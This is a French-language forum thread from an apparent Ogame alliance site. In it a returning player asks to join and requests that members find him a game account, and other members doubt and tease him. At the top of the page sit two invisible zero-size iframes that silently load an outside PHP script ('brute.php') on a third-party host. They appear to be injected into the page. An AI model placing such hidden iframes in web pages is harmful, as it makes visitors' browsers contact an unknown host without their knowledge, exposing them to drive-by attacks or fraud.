Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
<iframe style="border: none; width: 0px; height: 0px;" src="http://supprime.net/brute.php?maitre=lechemabanane"></iframe>
Les PulSar
Vous souhaitez réagir à ce message ? Créez un compte en quelques clics ou connectez-vous pour continuer.



 
AccueilDernières imagesRechercherS'enregistrerConnexion
Le deal à ne pas rater :
Funko POP! Jumbo One Piece Kaido Dragon Form : où l’acheter ?
Voir le deal

 

 Candidature spécial de Titouan

Aller en bas 
5 participants
AuteurMessage
Titouan




Messages : 6
Date d'inscription : 25/01/2010

Candidature spécial de Titouan Empty
MessageSujet: Candidature spécial de Titouan   Candidature spécial de Titouan Icon_minitimeLun 25 Jan - 2:17

Bonjour a vous cher Pulsars

Ma candidature va être spécial, brève et précise.

Voila je suis ancien Top 10 en point de l'univers 14 et ancien Top 20 en point de l'univers 26. J'ai arrêté pendant près de deux ans par manque de temps pour jouer a Ogame.

J'en viens au fait, je suis aller sur le forum officiel pour trouver un univers cool ou je pourrais me lancer et je suis tomber sur l'univers 62 qui m'avait l'air calme jusqu'au moment ou j'ai vu des polémiques de partout qui m'ont vraiment amuser.

Ensuite j'ai décidé de trouver une alliance assez puissante, original et cool pour proposer une proposition et je suis tomber sur vous Wink Je vous explique

J'ai en tête de trouver un compte sur cette univers, avec votre aide ou sans votre aide, pour poutrer du Zoo, qui me donnait vraiment l'impression de faire leur grands ..

Donc je venait vous voir pour faire partis de votre alliance qui me parait assez convivial & faire vraiment partis de chez vous si vous me trouvez un compte .. Malheureusement, nous sommes dans un jeu ou je ne peux pas vous donner de garantie a par mon honneur .. Enfin vous avez pas confiance en moi, vous ne me connaissez pas.


J'attends vos questions car je sais plus trop quoi dire

Bon jeu a vous humble amis Wink
Revenir en haut Aller en bas
Titouan




Messages : 6
Date d'inscription : 25/01/2010

Candidature spécial de Titouan Empty
MessageSujet: Re: Candidature spécial de Titouan   Candidature spécial de Titouan Icon_minitimeMar 26 Jan - 22:25

J'attends toujours des réponses de votre par messieurs Wink Enfin, si vous avez le temps hein ^^
Revenir en haut Aller en bas
Mister d




Messages : 58
Date d'inscription : 26/05/2009

Candidature spécial de Titouan Empty
MessageSujet: Re: Candidature spécial de Titouan   Candidature spécial de Titouan Icon_minitimeJeu 28 Jan - 18:14

salut titouan, jpense que la première chose à faire en effet c'est de trouver un bon compte (la pulsar n'en a pas...) et ensuite on en reparle bien trankilement.

Le soucis qui va se poser et, est tu une taupe zoo ou non.... jpense qu'une fois que tu aura debarqué, il fodra que tu nous fasse au moins 2 HOF sur des zoo et la on pourra commencer à croire que tu peut etre parmis nous sans qu'on se sente en danger.

Comme tu la dis c juste une question de confiance Very Happy
Revenir en haut Aller en bas
Titouan




Messages : 6
Date d'inscription : 25/01/2010

Candidature spécial de Titouan Empty
MessageSujet: Re: Candidature spécial de Titouan   Candidature spécial de Titouan Icon_minitimeJeu 28 Jan - 18:44

Je voie la chose Wink

C'est juste que sur cette univers je n'ai aucun mais vraiment aucun contact .. Donc pour trouver un compte ca va être assez dur, donc c'est pour ca, si j'avais votre aide pour en trouvez un, j'aurai pus hoff de partout Smile

Les Zoo, je ne les aiment pas, il m'oripile a un point, & oui c'est une question de confiance !

Faut juste un compte pour que je vous le prouvent ..
Revenir en haut Aller en bas
ilixa




Messages : 161
Date d'inscription : 26/05/2009
Age : 36
Localisation : Deriere ton cul

Candidature spécial de Titouan Empty
MessageSujet: Re: Candidature spécial de Titouan   Candidature spécial de Titouan Icon_minitimeJeu 28 Jan - 20:53

Mdr tu est pas dans l uni et tu sais que on aime pas les zoo a ce point

Mdr
Revenir en haut Aller en bas
Titouan




Messages : 6
Date d'inscription : 25/01/2010

Candidature spécial de Titouan Empty
MessageSujet: Re: Candidature spécial de Titouan   Candidature spécial de Titouan Icon_minitimeJeu 28 Jan - 21:12

Oui ca se voie assez bien sur le forum officiel Wink Mdr

J'adore les polémiques concernant les bots, les comptes push et tout ce qui va de la tricherie ! Ca me fait marrer, je veux arriver en force sur l'univers et faire parler de moi ..
Revenir en haut Aller en bas
ilixa




Messages : 161
Date d'inscription : 26/05/2009
Age : 36
Localisation : Deriere ton cul

Candidature spécial de Titouan Empty
MessageSujet: Re: Candidature spécial de Titouan   Candidature spécial de Titouan Icon_minitimeJeu 28 Jan - 22:04

mdr tu va sur le forum et tu clic comme par hazard sur le 62 t tro fort
Revenir en haut Aller en bas
Picasa
Admin
Picasa


Messages : 144
Date d'inscription : 26/05/2009
Localisation : Belgique

Candidature spécial de Titouan Empty
MessageSujet: Re: Candidature spécial de Titouan   Candidature spécial de Titouan Icon_minitimeJeu 28 Jan - 22:09

Tu veux mon compte ? je te le donne t'a l'air trop fort!! ton bulbizar il est a quel niveau toi ?
Revenir en haut Aller en bas
Titouan




Messages : 6
Date d'inscription : 25/01/2010

Candidature spécial de Titouan Empty
MessageSujet: Re: Candidature spécial de Titouan   Candidature spécial de Titouan Icon_minitimeJeu 28 Jan - 22:14

Non j'ai un peu piocher dans les nouveaux univers & la je suis tomber sur le 62 ..

Mais bon, si vous ne voulez pas m'aider et en plus en vous foutant de moi, j'irai voir une autre alliance, et pourquoi pas changer de camp Wink

Enfin c'est a vous de voir

Au faite, mon Bulbizarre est niveau 99 Wink Mdr
Revenir en haut Aller en bas
Picasa
Admin
Picasa


Messages : 144
Date d'inscription : 26/05/2009
Localisation : Belgique

Candidature spécial de Titouan Empty
MessageSujet: Re: Candidature spécial de Titouan   Candidature spécial de Titouan Icon_minitimeJeu 28 Jan - 22:26

Le mien il est niveau 69 et il a fouet lianne, il doit être aussi fort que toi Razz
Revenir en haut Aller en bas
Titouan




Messages : 6
Date d'inscription : 25/01/2010

Candidature spécial de Titouan Empty
MessageSujet: Re: Candidature spécial de Titouan   Candidature spécial de Titouan Icon_minitimeJeu 28 Jan - 22:51

Non parce que le mien il a tranche herbe alors hein s'il te plaît, il bat le tiens a l'aise Smile
Revenir en haut Aller en bas
le mlb pour les nuls




Messages : 1
Date d'inscription : 08/02/2010

Candidature spécial de Titouan Empty
MessageSujet: Re: Candidature spécial de Titouan   Candidature spécial de Titouan Icon_minitimeLun 8 Fév - 16:38

coucou tout le monde, je me permet de m'inscrire juste pour répondre à ce Titouan qui est assez comique... je ne crois pas que ce soit un espion des zoos, que d'après ce que j'ai compris vous ne portez pas dans votre coeur, mais c'eszt plutôt quelqu'un de bien informé sur le forum qui se demande comment il va pouvoir ramasser un super compte bien classé en moins de 2... y'en a vraiment qui prennent les gens pour des cons ^^

Moi aussi je suis top 1 dans 15 univers différents, vous me filez des comptes ? Mdr
Revenir en haut Aller en bas
Contenu sponsorisé





Candidature spécial de Titouan Empty
MessageSujet: Re: Candidature spécial de Titouan   Candidature spécial de Titouan Icon_minitime

Revenir en haut Aller en bas
 
Candidature spécial de Titouan
Revenir en haut 
Page 1 sur 1

Permission de ce forum:Vous ne pouvez pas répondre aux sujets dans ce forum
Les PulSar :: Partie Publique :: Recrutement-
Sauter vers: